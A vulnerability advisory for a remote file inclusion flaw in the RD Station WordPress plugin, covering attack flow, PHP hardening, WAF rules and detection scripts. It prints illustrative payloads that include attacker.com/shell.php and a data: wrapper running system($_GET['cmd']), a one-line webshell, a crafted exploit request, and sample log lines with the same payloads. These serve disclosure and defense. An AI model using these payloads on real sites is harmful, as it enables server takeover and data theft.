CVE-2026-49774: RD Station WordPress Plugin Remote Code Injection
A critical code injection vulnerability has been disclosed in the RD Station WordPress plugin, developed by Filipe Nasc. Tracked as CVE-2026-49774 with a CVSS score of 9.9 (Critical), this flaw allows attackers to achieve Remote Code Execution (RCE) via Remote File Inclusion (RFI) — one of the most severe vulnerability classes in web application security.
All versions of the plugin through 5.6.0 are affected. The vulnerability is classified under CWE-94 (Improper Control of Generation of Code).
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-49774 |
| CVSS Score | 9.9 (Critical) |
| CWE Classification | CWE-94 — Code Injection |
| Attack Type | Remote File Inclusion (RFI) leading to Remote Code Execution |
| Affected Plugin | RD Station (by Filipe Nasc) |
| Affected Versions | All versions up to and including 5.6.0 |
| Authentication Required | Not confirmed by the advisory (under CVSS 3.1 a score of 9.9 corresponds to PR:L, a low-privilege account, with changed scope; the same vector with PR:N scores 10.0) |
| Patch Available | Any release later than 5.6.0 |
About RD Station
RD Station is a Brazilian marketing automation platform widely used by businesses in Latin America and internationally for lead management, CRM integration, and marketing campaign automation. The WordPress plugin integrates WordPress sites with the RD Station platform, enabling form capture, lead tracking, and marketing funnel management directly from a WordPress installation.
The plugin's broad deployment across business websites makes this vulnerability particularly significant: exploitation grants code execution as the PHP worker user on the hosting server, not merely control of the WordPress installation.
Technical Background
Remote File Inclusion (RFI)
Remote File Inclusion occurs when a PHP application passes user-supplied input to include() or require() without adequate validation. Whether a remote payload can be pulled in depends on PHP configuration: include() of http://, ftp://, data: and php://input targets requires allow_url_include=On (Off by default since PHP 5.2.0 and deprecated since 7.4, but still found on misconfigured hosts), and the http:// and ftp:// wrappers additionally require allow_url_fopen=On (the default). Even with both disabled, an attacker who controls the path can still include local files already on the server, so the configuration limits the payload delivery channel rather than removing the flaw.
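The allow_url_include and allow_url_fopen gates described above, together with the open_basedir and disable_functions settings recommended under PHP Configuration Hardening below, can be verified mechanically. The script below is an added example, not code from the advisory or from the RD Station plugin: it parses a php.ini-style file, classifies which remote-include channels remain open, and reports gaps in open_basedir and disable_functions. The two ini fragments it writes are constructed for the demonstration and do not come from any real host.

```bash
#!/usr/bin/env bash
# Added example (not from the advisory): audit a php.ini-style file for the
# directives that gate remote file inclusion and post-exploitation.
# Constructed sample ini fragments are used as input; no real host is read.

# Print the lowercased value of a directive, honouring ';' comments and
# "last assignment wins" semantics. Empty output means "not set".
ini_value() {
    awk -v key="$2" '
        /^[ \t]*;/ { next }                       # comment line
        {
            line = $0; sub(/;.*/, "", line)       # trailing comment
            n = index(line, "=")
            if (n == 0) next
            k = substr(line, 1, n - 1); v = substr(line, n + 1)
            gsub(/^[ \t]+|[ \t]+$/, "", k)
            gsub(/^[ \t]+|[ \t]+$/, "", v)
            gsub(/"/, "", v)
            if (tolower(k) == tolower(key)) val = v
        }
        END { print tolower(val) }' "$1"
}

is_on() { case "$1" in on|1|true|yes) return 0 ;; *) return 1 ;; esac; }

# include() of http://, ftp://, data: and php://input requires allow_url_include=On;
# the URL wrappers (http, ftp, data) additionally need allow_url_fopen=On.
# PHP defaults when unset: allow_url_include=Off, allow_url_fopen=On.
remote_include_state() {
    local inc fopen
    inc=$(ini_value "$1" allow_url_include)
    fopen=$(ini_value "$1" allow_url_fopen)
    if ! is_on "${inc:-off}"; then
        echo blocked            # only local paths (and php://filter) reach include()
    elif is_on "${fopen:-on}"; then
        echo open               # http://, ftp://, data: and php://input all includable
    else
        echo php-input-only     # URL wrappers stopped by allow_url_fopen; POST body still includable
    fi
}

# One finding per line: WARN for gaps, OK for hardened settings, NOTE for side effects.
audit_php_ini() {
    local f=$1 ob df fn
    case "$(remote_include_state "$f")" in
        open)           echo "WARN allow_url_include=On: include() accepts http://, ftp://, data: and php://input" ;;
        php-input-only) echo "WARN allow_url_include=On: php://input (request body) is still includable" ;;
        blocked)        echo "OK   allow_url_include is off" ;;
    esac
    ob=$(ini_value "$f" open_basedir)
    if [ -n "$ob" ]; then echo "OK   open_basedir=$ob"
    else echo "WARN open_basedir unset: a local file inclusion can reach any path readable by the PHP worker"; fi
    df=",$(ini_value "$f" disable_functions | tr -d ' '),"
    for fn in system exec shell_exec passthru proc_open popen; do
        case "$df" in *",$fn,"*) ;; *) echo "WARN $fn not in disable_functions" ;; esac
    done
    case "$df" in *,curl_exec,*)
        echo "NOTE curl_exec disabled: WordPress's HTTP API (and the plugin's RD Station API calls) fall back to the fsockopen transport; test them" ;;
    esac
}

warn_count() { audit_php_ini "$1" | awk '/^WARN/ { n++ } END { print n + 0 }'; }

# Constructed sample fragments (not taken from any real host). $1 is weak or hardened.
write_sample_ini() {
    local f; f=$(mktemp)
    if [ "$1" = weak ]; then
        cat > "$f" <<'EOF'
; constructed: permissive shared-host configuration
allow_url_fopen = On
allow_url_include = On   ; left enabled for a legacy application
disable_functions =
EOF
    else
        cat > "$f" <<'EOF'
; constructed: the hardening recommended in this advisory
allow_url_fopen = On
allow_url_include = Off
open_basedir = "/var/www/html:/tmp"
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec
EOF
    fi
    printf '%s\n' "$f"
}

# Stand-alone run: audit both samples.
for kind in weak hardened; do
    f=$(write_sample_ini "$kind")
    echo "== $kind (remote include: $(remote_include_state "$f"), warnings: $(warn_count "$f"))"
    audit_php_ini "$f"
    rm -f "$f"
done
```

Point it at the file reported by php --ini on the host (or the FPM pool's php_admin_value lines) rather than at the samples; the three-state classification matters because a host with allow_url_fopen=Off but allow_url_include=On still accepts php://input, which the single-directive check in many hardening guides misses.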
The RD Station plugin contains a code path where user-controlled input influences a PHP include() or require() call:
// Vulnerable pattern (illustrative; the real parameter name is not given in the advisory)
$file = $_GET['template'];
include($file); // Attacker controls $file
// Attack payloads (illustrative)
// ?template=http://attacker.com/shell.php   (needs allow_url_include=On and allow_url_fopen=On)
// ?template=php://input                      (needs allow_url_include=On; PHP code in the POST body)
// ?template=data://text/plain,<?php system($_GET['cmd']); ?>   (needs allow_url_include=On)
Why CVSS 9.9?
The near-maximum score reflects:
- Complete confidentiality, integrity, and availability impact: full compromise of the PHP worker and everything it can reach
- Low attack complexity: straightforward to exploit with standard tools
- No user interaction: exploitation is fully remote and automatable
- Changed scope: impact extends beyond the WordPress installation to the underlying server and co-hosted applications
Note what the score does not say. Under CVSS 3.1, AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H is exactly 9.9, while the same vector with PR:N is 10.0. The published score is therefore consistent with exploitation by a low-privilege authenticated user (for example a subscriber account), which also matches the wp-admin request shown in the attack flow; the advisory does not confirm unauthenticated exploitation.
Attack Flow
1. Attacker identifies a WordPress site with RD Station plugin <= 5.6.0 installed
2. Attacker identifies the vulnerable parameter via directory scanning,
source review, or known PoC
3. Attacker hosts a malicious PHP webshell on an attacker-controlled server:
<?php system($_GET['cmd']); ?>
4. Attacker sends a crafted HTTP request. The request below is illustrative: the advisory does not name the vulnerable parameter, and a wp-admin page requires a logged-in session:
GET /wp-admin/?page=rd-station&template=http://attacker.com/shell.php
(or uses PHP wrappers: php://input, data://, etc., which need allow_url_include=On)
5. PHP fetches and executes the attacker's PHP code under the PHP worker's user
(www-data, apache, or the PHP-FPM pool user; nginx itself never executes PHP)
6. Attacker executes arbitrary OS commands:
- Read /etc/passwd, application configs, .env files
- Write webshells for persistent access
- Pivot to other services on the local network
- Exfiltrate database credentials and escalate to DB access
- Deploy cryptocurrency miners or ransomware payloads
Scope and Prevalence
RD Station is the leading marketing automation tool in Brazil and has substantial adoption across Latin American businesses. WordPress sites with the RD Station plugin serve as the integration point for:
- Lead capture forms feeding into RD Station CRM
- Marketing campaign tracking pixels
- Customer lifecycle automation workflows
A successful exploitation does not merely compromise the WordPress site — it grants OS-level command execution on the hosting server, potentially affecting co-hosted sites in shared environments, local database servers, and internal network resources reachable from the compromised host.
Remediation
Primary Fix: Update the Plugin
Update the RD Station plugin to the first release later than 5.6.0 as soon as it is published. Confirm the installed slug and version with wp plugin list first; the slug rd-station below is assumed:
# Via WP-CLI
wp plugin update rd-station
# Verify the version
wp plugin get rd-station --field=version
Or update via WordPress Admin > Plugins > RD Station > Update Now.
PHP Configuration Hardening
Regardless of whether a patch is applied, harden PHP to limit RFI exposure:
; php.ini — disable remote file inclusion
; (allow_url_include, allow_url_fopen and disable_functions are PHP_INI_SYSTEM: they take
;  effect only in php.ini or a PHP-FPM pool's php_admin_value, not in .htaccess or ini_set())
allow_url_include = Off
allow_url_fopen = Off ; also blocks legitimate fopen()/file_get_contents() of URLs; WordPress prefers cURL, but evaluate impact first
; Disable dangerous functions. The whole list must stay on one line: php.ini does not continue
; a value across a line break. Include curl_exec only if you accept that WordPress's HTTP API
; (and the plugin's own RD Station API calls) fall back to the fsockopen transport; test afterwards.
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
Web Application Firewall Rules
Deploy WAF rules targeting code injection patterns. Match after URL decoding (attackers send php%3A%2F%2F rather than php://), and scope URL-blocking rules to the vulnerable parameter or to wp-admin paths, because blanket blocking of http:// in parameter values breaks redirect, share and embed parameters on most sites:
# Cloudflare WAF / ModSecurity rule examples (conceptual)
Block requests containing: php://, data:, expect://, zip://, phar:// in query or body parameter values
Block requests containing: allow_url_include, shell_exec, system( in parameter values
Block requests containing remote URL patterns (http://, https://, ftp://) in parameter values of the affected plugin's endpoints
Interim Risk Reduction
If immediate patching is impossible:
- Deactivate the plugin: disable RD Station until a fixed version is available (lead capture through the plugin stops while it is off)
- Restrict wp-admin access: use IP allowlisting to limit who can reach WordPress admin endpoints; this also cuts off low-privilege accounts that could otherwise log in from anywhere
- Enable PHP open_basedir: restrict PHP file access to the web root and temp directories (this limits local file inclusion; it does not block http:// or data: wrappers, which are governed by allow_url_include)
- Monitor for webshells: scan the WordPress directory for unexpected PHP files, and compare core and plugin files against their official releases with wp core verify-checksums and wp plugin verify-checksums --all
# Scan for recently modified PHP files (potential webshells)
find /var/www/html -name "*.php" -newer /var/www/html/wp-config.php \
-exec ls -la {} \;
# Look for common webshell patterns
grep -rn "shell_exec\|passthru\|base64_decode.*eval\|eval(.*\$_" \
/var/www/html --include="*.php"
Detection
Signs of active exploitation:
# Check the request field of access logs for RFI-typical patterns, including URL-encoded forms.
# Grepping whole lines for http:// matches the Referer on almost every request, so cut out the request field first
awk -F'"' '{print $2}' /var/log/nginx/access.log | \
grep -iE "(https?|ftp|php|expect)(://|%3A%2F%2F)|data(:|%3A)" | \
grep -iE "rd-station|template=|file=" | tail -100
# Look for webshell interaction patterns in access logs
grep -E "\?cmd=|\&cmd=|shell_exec|whoami|uname%20" \
/var/log/nginx/access.log | tail -50
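The greps above are a quick triage and miss encoded payloads unless every encoding is spelled out. The script below is an added example, not part of the advisory: it URL-decodes the request field of combined-format access-log lines and flags any query parameter whose value begins with a PHP stream wrapper or a remote URL scheme, while never looking at the Referer field. The log lines it scans are constructed for the demonstration; the rd-station and template names in them are the illustrative ones used on this page, not confirmed plugin parameters.

```bash
#!/usr/bin/env bash
# Added example (not from the advisory): detect RFI-style parameter values in
# combined-format access logs after URL decoding. Sample lines are constructed.

# Decode a query-string component: '+' to space, %XX to the byte
# (bash printf %b understands \xHH escapes).
urldecode() {
    local s="${1//+/ }"
    printf '%b' "${s//%/\\x}"
}

# Exit 0 when some query parameter value starts with a stream wrapper or remote URL scheme.
# $1: request target as logged, e.g. "/wp-admin/?page=rd-station&template=php%3A%2F%2Finput"
# Pairs are split before decoding so an encoded '&' inside a value cannot hide a parameter.
is_rfi_request() {
    local target=$1 query
    query=${target#*\?}
    [ "$query" = "$target" ] && return 1          # no query string at all
    printf '%s\n' "$query" | tr '&' '\n' | while IFS= read -r pair; do
        urldecode "$pair"; printf '\n'
    done | grep -qiE '^[^=]*=(https?://|ftp://|php://|data:|expect://|zip://|phar://|glob://)'
}

# Print the log lines whose request target trips is_rfi_request. Only the first
# double-quoted field (the request line) is examined, never the Referer.
scan_access_log() {
    local line request target
    while IFS= read -r line; do
        request=${line#*\"}          # drop everything up to the opening quote
        request=${request%%\"*}      # keep: METHOD target HTTP/x
        target=${request#* }         # drop METHOD
        target=${target%% *}         # drop HTTP/x
        [ -n "$target" ] && is_rfi_request "$target" && printf '%s\n' "$line"
    done < "$1"
    return 0
}

count_rfi_hits() { scan_access_log "$1" | awk 'END { print NR }'; }

# Constructed sample lines (not real traffic). Parameter names follow the illustrative
# request used in this advisory; they are not confirmed plugin parameters.
write_sample_log() {
    local f; f=$(mktemp)
    cat > "$f" <<'EOF'
203.0.113.10 - - [01/Jan/2026:10:00:01 +0000] "GET /wp-admin/?page=rd-station&template=http://attacker.example/shell.php HTTP/1.1" 200 512 "-" "curl/8.5.0"
203.0.113.10 - - [01/Jan/2026:10:00:02 +0000] "POST /wp-admin/?page=rd-station&template=php%3A%2F%2Finput HTTP/1.1" 200 512 "-" "curl/8.5.0"
203.0.113.11 - - [01/Jan/2026:10:00:03 +0000] "GET /wp-admin/?page=rd-station&template=data%3Atext%2Fplain%2C%3C%3Fphp+system%28%24_GET%5Bcmd%5D%29%3B%3F%3E HTTP/1.1" 200 64 "-" "python-requests/2.31"
198.51.100.7 - - [01/Jan/2026:10:00:04 +0000] "GET /contact/?utm_source=newsletter&utm_medium=email HTTP/1.1" 200 9001 "http://www.example.com/blog/" "Mozilla/5.0"
198.51.100.8 - - [01/Jan/2026:10:00:05 +0000] "GET /wp-login.php?redirect_to=%2Fwp-admin%2F HTTP/1.1" 200 3000 "https://example.com/" "Mozilla/5.0"
EOF
    printf '%s\n' "$f"
}

# Stand-alone run: prints the three suspicious requests and neither benign line.
log=$(write_sample_log)
scan_access_log "$log"
rm -f "$log"
```

Run scan_access_log against the real nginx or Apache log; the only expected false positives are parameters that legitimately carry full URLs (redirect or share targets), which can be excluded by name once identified. A hit on the plugin's endpoints from an account that should not be in wp-admin is the point at which the webshell file scans below become urgent.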
# Check for unauthorized file creation
find /var/www/html -name "*.php" -ctime -7 | \
xargs grep -l "shell_exec\|system\|passthru" 2>/dev/null
Impact Assessment
| Impact Area | Severity | Description |
|---|---|---|
| Remote Code Execution | Critical | Full OS command execution as web server user |
| Server Compromise | Critical | Webshell deployment enables persistent backdoor access |
| Data Exfiltration | Critical | Database credentials, config files, customer data |
| Lateral Movement | High | Access to internal network resources from compromised host |
| Shared Host Spillover | High | Co-hosted sites on shared servers may be affected |
| Exploitation Barrier | Very Low | Well-understood attack class with public tooling; authentication requirement not confirmed (the 9.9 score is consistent with a low-privilege account) |
Key Takeaways
- CVE-2026-49774 is a critical RFI/code injection flaw in RD Station WordPress plugin versions through 5.6.0
- CVSS 9.9 Critical: full remote code execution with changed scope; under CVSS 3.1 the score corresponds to low privileges required, and unauthenticated exploitation is not confirmed
- OS-level impact: exploitation grants command execution as the PHP worker user, not just WordPress admin access
- Harden PHP: set allow_url_include=Off as a defense-in-depth measure regardless of patch status
- Immediate action: update the plugin; deactivate it if unable to patch; audit for signs of prior exploitation